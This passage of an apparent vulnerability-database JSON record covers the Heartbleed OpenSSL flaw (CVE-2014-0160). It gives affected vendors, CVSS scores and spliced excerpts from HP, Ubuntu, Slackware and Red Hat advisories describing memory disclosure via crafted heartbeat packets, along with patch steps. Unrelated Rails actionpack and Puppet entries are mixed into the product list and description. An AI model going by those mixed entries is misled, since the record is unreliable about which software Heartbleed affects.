"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "hitachi",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "intel",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "juniper",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mandriva s a",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "marklogic",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nvidia",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "netbsd",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openbsd",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openvpn",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "red hat",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "slackware linux",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sophos",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "symantec",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ubuntu",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "unisys",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "vmware",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "watchguard",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "wind river",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nginx",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "opensuse",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "pfsense",
"version": null
},
{
"_id": null,
"model": "studio onsite",
"scope": "eq",
"trust": 0.6,
"vendor": "suse",
"version": "1.3"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.6,
"vendor": "s u s e",
"version": "13.1"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.6,
"vendor": "s u s e",
"version": "12.3"
},
{
"_id": null,
"model": "software collections for rhel",
"scope": "eq",
"trust": 0.6,
"vendor": "redhat",
"version": "0"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "puppetlabs",
"version": "3.1"
},
{
"_id": null,
"model": "chef",
"scope": "eq",
"trust": 0.6,
"vendor": "opscode",
"version": "11.1.2"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux s/390",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux mips",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux ia-64",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux ia-32",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.6,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "chef",
"scope": "ne",
"trust": 0.6,
"vendor": "opscode",
"version": "11.1.3"
},
{
"_id": null,
"model": "webyast",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "1.3"
},
{
"_id": null,
"model": "lifecycle management server",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "1.3"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "12.2"
},
{
"_id": null,
"model": "actionpack",
"scope": "eq",
"trust": 0.3,
"vendor": "rubygems",
"version": "3.0"
},
{
"_id": null,
"model": "actionpack",
"scope": "eq",
"trust": 0.3,
"vendor": "rubygems",
"version": "4.0.1"
},
{
"_id": null,
"model": "actionpack",
"scope": "eq",
"trust": 0.3,
"vendor": "rubygems",
"version": "3.2.15"
},
{
"_id": null,
"model": "openstack",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3.0"
},
{
"_id": null,
"model": "actionpack",
"scope": "ne",
"trust": 0.3,
"vendor": "rubygems",
"version": "4.0.2"
},
{
"_id": null,
"model": "actionpack",
"scope": "ne",
"trust": 0.3,
"vendor": "rubygems",
"version": "3.2.16"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "3.1.1"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.1.7"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.1.5"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "1.1"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.10"
},
{
"_id": null,
"model": "on rails ruby on rails 3.1.0.rc5",
"scope": null,
"trust": 0.3,
"vendor": "ruby",
"version": null
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "2.0.3"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "2.8.4"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.14"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.2.12"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.2"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.2"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "3.2"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.2.4"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "1.2.7"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "1.2"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.12"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.1.11"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.17"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "3.0.1"
},
{
"_id": null,
"model": "cloudforms",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3.0"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.1.2"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.1"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.1.12"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.2.15"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "2.7.1"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.13"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.1"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "1.0"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "2.8.3"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.16"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.2.6"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.18"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.4"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "ne",
"trust": 0.3,
"vendor": "ruby",
"version": "3.2.17"
},
{
"_id": null,
"model": "centos",
"scope": "eq",
"trust": 0.3,
"vendor": "centos",
"version": "6"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.7"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "2.8.0"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "2.5.2"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.6"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.2.7"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.8"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "3.0"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.20"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "3.1.2"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "2.5.1"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "3.1.1"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.1.6"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.1.4"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "2.6"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.5"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "3.1.3"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "2.7.2"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.1.9"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.2.16"
},
{
"_id": null,
"model": "on rails ruby on rails 3.1.0.rc6",
"scope": null,
"trust": 0.3,
"vendor": "ruby",
"version": null
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.1.8"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "2.0"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.11"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "2.0.2"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.3"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.0.19"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.2.13"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.2.11"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.2.8"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.2.10"
},
{
"_id": null,
"model": "on rails ruby on rails",
"scope": "eq",
"trust": 0.3,
"vendor": "ruby",
"version": "3.2.2"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "2.8.2"
},
{
"_id": null,
"model": "puppet enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "puppetlabs",
"version": "2.7"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#720951"
},
{
"db": "BID",
"id": "64074"
},
{
"db": "BID",
"id": "65604"
},
{
"db": "NVD",
"id": "CVE-2014-0160"
}
]
},
"credits": {
"_id": null,
"data": "HP",
"sources": [
{
"db": "PACKETSTORM",
"id": "126605"
},
{
"db": "PACKETSTORM",
"id": "126954"
},
{
"db": "PACKETSTORM",
"id": "126284"
},
{
"db": "PACKETSTORM",
"id": "126361"
},
{
"db": "PACKETSTORM",
"id": "126417"
},
{
"db": "PACKETSTORM",
"id": "126305"
},
{
"db": "PACKETSTORM",
"id": "126644"
},
{
"db": "PACKETSTORM",
"id": "126164"
},
{
"db": "PACKETSTORM",
"id": "127279"
},
{
"db": "PACKETSTORM",
"id": "127085"
},
{
"db": "PACKETSTORM",
"id": "126784"
}
],
"trust": 1.1
},
"cve": "CVE-2014-0160",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2014-0160",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 5.0,
"collateralDamagePotential": "LOW-MEDIUM",
"confidentialityImpact": "PARTIAL",
"confidentialityRequirement": "HIGH",
"enviromentalScore": 6.5,
"exploitability": "FUNCTIONAL",
"exploitabilityScore": 10.0,
"id": "CVE-2014-0160",
"impactScore": 2.9,
"integrityImpact": "NONE",
"integrityRequirement": "HIGH",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "OFFICIAL FIX",
"reportConfidence": "CONFIRMED",
"severity": "MEDIUM",
"targetDistribution": "HIGH",
"trust": 0.8,
"userInteractionRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2014-0160",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-0160",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2014-0160",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2014-0160",
"trust": 0.8,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2014-0160",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#720951"
},
{
"db": "VULMON",
"id": "CVE-2014-0160"
},
{
"db": "NVD",
"id": "CVE-2014-0160"
},
{
"db": "NVD",
"id": "CVE-2014-0160"
}
]
},
"description": {
"_id": null,
"data": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug. OpenSSL 1.0.1 and 1.0.2 beta contain a vulnerability that could disclose sensitive private information to an attacker. This vulnerability is commonly referred to as \"heartbleed.\". RubyGems actionpack is prone to a denial-of-service vulnerability. \nRemote attackers can exploit this issue to cause denial-of-service conditions. \nOpenSSL is a 3rd party product that is embedded with some of HP Software\nproducts. This bulletin objective is to notify HP Software customers about\nproducts affected by the Heartbleed vulnerability. This weakness\npotentially allows disclosure of information protected, under normal\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\nbelow are vulnerable due to embedding OpenSSL standard release software. Each bulletin will include a patch and/or mitigation\nguideline. \n\nNote: OpenSSL is an external product embedded in HP products. \n\nBulletin Applicability:\n\nThis bulletin applies to each OpenSSL component that is embedded within the\nHP products listed in the security bulletin. The bulletin does not apply to\nany other 3rd party application (e.g. operating system, web server, or\napplication server) that may be required to be installed by the customer\naccording instructions in the product install guide. \n\nTo learn more about HP Software Incident Response, please visit http://www8.h\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\nenter.html . No user action is\nrequired to install them. \nHP StoreEver ESL G3 Tape Libraries with MCB rev 2 OpenSSL version 1.0.1f for\nthe following firmware versions:\n\n671H_GS00601\n665H_GS12501\n663H_GS04601\n\nHP StoreEver ESL G3 Tape Libraries with MCB rev 1 Open SSL version 1.0.1e in\n655H firmware versions:\n\n655H_GS10201\n\nHP StoreEver Enterprise Library LTO-6 Tape Drives: all firmware versions. \nIf the library firmware cannot be updated, HP recommends following the\nMitigation Instructions below. \n\nMitigation Instructions\n\nThe following configuration options that allow access to the Heartbeat\nfunction in the vulnerable versions of OpenSSL are not enabled by default. \nVerify that the following options are \"disabled\" using the Tape Library GUI:\n\nProduct Configuration Options to Disable TLS Heartbeat Functions\n\nSecure SMI-S\nCVTL User\n\nNote: Disabling these features blocks the vulnerable OpenSSL function in both\nthe ESL G3 Tape Library and the StoreEver Enterprise Library LTO-6 Tape\nDrives. The basic functionality of the library is not affected by these\nconfiguration changes and SSL access to the user interface is not affected by\nthis configuration change or setting. ============================================================================\nUbuntu Security Notice USN-2165-1\nApril 07, 2014\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 13.10\n- Ubuntu 12.10\n- Ubuntu 12.04 LTS\n\nSummary:\n\nOpenSSL could be made to expose sensitive information over the network,\npossibly including private keys. \n\nSoftware Description:\n- openssl: Secure Socket Layer (SSL) cryptographic library and tools\n\nDetails:\n\nNeel Mehta discovered that OpenSSL incorrectly handled memory in the TLS\nheartbeat extension. (CVE-2014-0160)\n\nYuval Yarom and Naomi Benger discovered that OpenSSL incorrectly handled\ntiming during swap operations in the Montgomery ladder implementation. An\nattacker could use this issue to perform side-channel attacks and possibly\nrecover ECDSA nonces. (CVE-2014-0076)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 13.10:\n libssl1.0.0 1.0.1e-3ubuntu1.2\n\nUbuntu 12.10:\n libssl1.0.0 1.0.1c-3ubuntu2.7\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.12\n\nAfter a standard system update you need to reboot your computer to make all\nthe necessary changes. Since this issue may have resulted in compromised\nprivate keys, it is recommended to regenerate them. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1g-i486-1_slack14.1.txz: Upgraded. \n Thanks for Neel Mehta of Google Security for discovering this bug and to\n Adam Langley \u003cagl@chromium.org\u003e and Bodo Moeller \u003cbmoeller@acm.org\u003e for\n preparing the fix. \n Fix for the attack described in the paper \"Recovering OpenSSL\n ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack\"\n by Yuval Yarom and Naomi Benger. Details can be obtained from:\n http://eprint.iacr.org/2014/140\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076\n (* Security fix *)\npatches/packages/openssl-solibs-1.0.1g-i486-1_slack14.1.txz: Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1g-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1g-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1g-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1g-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1g-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1g-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1g-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1g-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1g-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1g-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1g-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1g-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 packages:\n5467a62ebfbe9a9bfff64dcc4cfcdf7d openssl-1.0.1g-i486-1_slack14.0.txz\nbdadd9920f2ce6fe4a0a7bd0d96f99df openssl-solibs-1.0.1g-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n11ede2992e2b5d15bd3ffc5807571350 openssl-1.0.1g-x86_64-1_slack14.0.txz\n858ea6409aab45a67a880458ce48f923 openssl-solibs-1.0.1g-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n8638083d9768ffcc4b7c597806ca634c openssl-1.0.1g-i486-1_slack14.1.txz\n4d9dfe9db9e1f286ead72fc60971807b openssl-solibs-1.0.1g-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nd85f8f451f71dd606f3adb59e582322a openssl-1.0.1g-x86_64-1_slack14.1.txz\n43ff4bbfe26f99e7a3b9145146d191a0 openssl-solibs-1.0.1g-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n265a66855320207d4a7567ac5ae9a747 a/openssl-solibs-1.0.1g-i486-1.txz\nbf07a4b17f1c78a4081e2cfb711b8748 n/openssl-1.0.1g-i486-1.txz\n\nSlackware x86_64 -current packages:\n27e5135d764bd87bdb784b288e416b22 a/openssl-solibs-1.0.1g-x86_64-1.txz\n5ef747eed99ac34102b34d8d0eaed3a8 n/openssl-1.0.1g-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1g-i486-1_slack14.1.txz openssl-solibs-1.0.1g-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \nIf bulk software or firmware updates are required, use an unaffected or\npatched version of HP Smart Update Manager (HP SUM) to do single or batch\nupdates. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: rhevm-spice-client security update\nAdvisory ID: RHSA-2014:0416-01\nProduct: Red Hat Enterprise Virtualization\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-0416.html\nIssue date: 2014-04-17\nCVE Names: CVE-2012-4929 CVE-2013-0169 CVE-2013-4353 \n CVE-2014-0160 \n=====================================================================\n\n1. Summary:\n\nUpdated rhevm-spice-client packages that fix multiple security issues are\nnow available for Red Hat Enterprise Virtualization Manager 3. \n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRHEV-M 3.3 - noarch\n\n3. Description:\n\nRed Hat Enterprise Virtualization Manager provides access to virtual\nmachines using SPICE. These SPICE client packages provide the SPICE client\nand usbclerk service for both Windows 32-bit operating systems and Windows\n64-bit operating systems. \n\nThe rhevm-spice-client package includes the mingw-virt-viewer Windows SPICE\nclient. OpenSSL, a general purpose cryptography library with a TLS\nimplementation, is bundled with mingw-virt-viewer. The mingw-virt-viewer\npackage has been updated to correct the following issues:\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server. (CVE-2014-0160)\n\nIt was discovered that OpenSSL leaked timing information when decrypting\nTLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites\nwere used. A remote attacker could possibly use this flaw to retrieve plain\ntext from the encrypted packets by using a TLS/SSL or DTLS server as a\npadding oracle. (CVE-2013-0169)\n\nA NULL pointer dereference flaw was found in the way OpenSSL handled\nTLS/SSL protocol handshake packets. A specially crafted handshake packet\ncould cause a TLS/SSL client using OpenSSL to crash. (CVE-2013-4353)\n\nIt was discovered that the TLS/SSL protocol could leak information about\nplain text when optional compression was used. An attacker able to control\npart of the plain text sent over an encrypted TLS/SSL connection could\npossibly use this flaw to recover other portions of the plain text. \n(CVE-2012-4929)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2014-0160. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter. \n\nThe updated mingw-virt-viewer Windows SPICE client further includes OpenSSL\nsecurity fixes that have no security impact on mingw-virt-viewer itself. \nThe security fixes included in this update address the following CVE\nnumbers:\n\nCVE-2013-6449, CVE-2013-6450, CVE-2012-2686, and CVE-2013-0166\n\nAll Red Hat Enterprise Virtualization Manager users are advised to upgrade\nto these updated packages, which address these issues. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs 